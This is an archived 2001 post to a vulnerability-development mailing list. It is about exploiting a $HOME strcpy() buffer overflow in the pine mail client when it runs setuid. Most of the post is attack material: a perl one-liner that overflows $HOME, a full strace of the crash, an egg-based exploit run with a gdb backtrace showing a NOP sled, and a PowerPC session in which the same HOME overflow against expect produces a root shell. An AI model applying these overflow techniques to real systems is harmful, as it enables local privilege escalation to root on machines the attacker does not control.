Vulnerability Development mailing list archives
Pine
From: Charles Stevenson <core () ezlink com>
Date: Wed, 11 Jul 2001 20:56:51 -0600
Hi all,

Has anyone ever coded a pine exploit? I know it's vulnerable to a $HOME strcpy() problem. And I have seen it suid this or that on several ISPs even though it shouldn't be ever! What are the implications of this with pine itself? Can you simply run a command from within it? I don't think pine was designed to be run as a suid and I'm not sure why anyone would give it such permissions.

[-(root@devastator:~/bleedingedge)> export HOME=`perl -e 'print "i" x 6969'`
[-(:1-07-11-20:20:51)-]<p0>
[-(root@devastator:/home/core/bleedingedge)> pine
[-(:1-07-11-20:21:10)-]<p0>
zsh: segmentation fault  pine
[-(root@devastator:/home/core/bleedingedge)> strace pine
[-(:1-07-11-20:21:12)-]<p0>
execve("/usr/bin/pine", ["pine"], [/* 20 vars */]) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40007000
mprotect(0x40000000, 20353, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
mprotect(0x8048000, 1352085, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
stat("/etc/ld.so.cache", {st_mode=S_IFREG|0644, st_size=8183, ...}) = 0
open("/etc/ld.so.cache", O_RDONLY) = 3
mmap(0, 8183, PROT_READ, MAP_SHARED, 3, 0) = 0x40008000
close(3) = 0
stat("/etc/ld.so.preload", 0xbfffe180) = -1 ENOENT (No such file or directory)
open("/lib/libtermcap.so.2", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3"..., 4096) = 4096
mmap(0, 12288, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4000a000
mmap(0x4000a000, 7276, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0x4000a000
mmap(0x4000c000, 3496, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x1000) = 0x4000c000
close(3) = 0
mprotect(0x4000a000, 7276, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
open("/lib/libc.so.5", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3"..., 4096) = 4096
mmap(0, 831488, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4000d000
mmap(0x4000d000, 599154, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0x4000d000
mmap(0x400a0000, 22664, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x92000) = 0x400a0000
mmap(0x400a6000, 200812, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x400a6000
close(3) = 0
mprotect(0x4000d000, 599154, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
munmap(0x40008000, 8183) = 0
mprotect(0x8048000, 1352085, PROT_READ|PROT_EXEC) = 0
mprotect(0x4000a000, 7276, PROT_READ|PROT_EXEC) = 0
mprotect(0x4000d000, 599154, PROT_READ|PROT_EXEC) = 0
mprotect(0x40000000, 20353, PROT_READ|PROT_EXEC) = 0
personality(PER_LINUX) = 0
geteuid() = 0
getuid() = 0
getgid() = 0
getegid() = 11
brk(0x81abb88) = 0x81abb88
brk(0x81ac000) = 0x81ac000
getpid() = 21010
time(NULL) = 994904475
getuid() = 0
open("/etc/nsswitch.conf", O_RDONLY) = 3
brk(0x81af000) = 0x81af000
fstat(3, {st_mode=S_IFREG|0644, st_size=1215, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40008000
read(3, "#\n# /etc/nsswitch.conf\n#\n# An"..., 4096) = 1215
read(3, "", 4096) = 0
close(3) = 0
munmap(0x40008000, 4096) = 0
open("/etc/passwd", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=28709, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40008000
read(3, "root:x:0:0::/root:/bin/sh\ndaemo"..., 4096) = 4096
lseek(3, -4070, SEEK_CUR) = 26
close(3) = 0
munmap(0x40008000, 4096) = 0
brk(0x81b1000) = 0x81b1000
ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++

[-(root@devastator:~/bleedingedge/test)> ./exploit4
[-(:1-07-11-20:34:22)-]<p0>
Using address: 0xbffffcc4
[root@devastator ~/bleedingedge/test]# export HOME=$EGG
[root@devastator /home/core/bleedingedge/test]# gdb pine
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (i586-unknown-linux), Copyright 1996 Free Software Foundation, Inc...
(gdb) r
Starting program: /usr/bin/pine
zsh: path too long: .zshenv

Program received signal SIGSEGV, Segmentation fault.
0x4007a43f in strcpy ()
(gdb) bt
#0  0x4007a43f in strcpy ()
#1  0x804a590 in _start ()
#2  0x90909090 in ?? ()
Cannot access memory at address 0x90909090.
(gdb) frame 0
#0  0x4007a43f in strcpy ()
(gdb) list
pine.c:252: No such file or directory.

Also I'm not quite understanding coding overflows on x86. I can't seem to overwrite the eip and my attempts on expect and pine both segfault. Can someone tell me what I'm missing? It's harder but easier on ppc arch. :) I mean it works so well on my iBook!

[ Buffer size: 512  Egg size: 2048  Aligment: 0 ]
[ Address: 0x100111f8  Offset: 0 ]
sh-2.05$ export HOME=$EGG
sh-2.05$ expect
sh-2.05# id
uid=0(root) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio),30(dip)
sh-2.05#

I don't feel like building pine for ppc but I'm sure it's just as simple. Thanks in advance for any x86 help.

Best Regards,
Charles Stevenson
Current thread:
- Pine Charles Stevenson (Jul 12)
- <Possible follow-ups>
- Re: Pine kernel51 () libertysurf fr (Jul 13)